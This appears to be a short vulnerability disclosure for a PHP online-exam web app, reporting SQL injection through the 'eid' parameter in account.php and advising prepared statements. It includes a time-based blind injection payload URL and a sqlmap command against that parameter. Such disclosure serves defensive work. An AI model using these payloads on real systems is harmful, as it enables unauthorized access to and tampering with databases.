Try   HackMD

code-projects online-exam-mastering-system-php has sql injection in account.php

supplier

https://code-projects.org/online-exam-mastering-system-php/

describe

In account.php,

Code analysis

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The SQL Injection vulnerability here exists because the value of $_GET['eid'] is directly embedded into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the eid parameter, it will be executed by the database. For example, if eid is set to '1' OR '1'='1', it could manipulate the query to return or modify unintended data. Always use prepared statements or parameterized queries to prevent this.

payload

http://host/account.php?q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 9913 FROM (SELECT(SLEEP(5)))emka) AND 'nnHe'='nnHe&n=1&t=5

exploit

use sqlmap to attack

sqlmap -u "/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5" -p eid --batch"

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →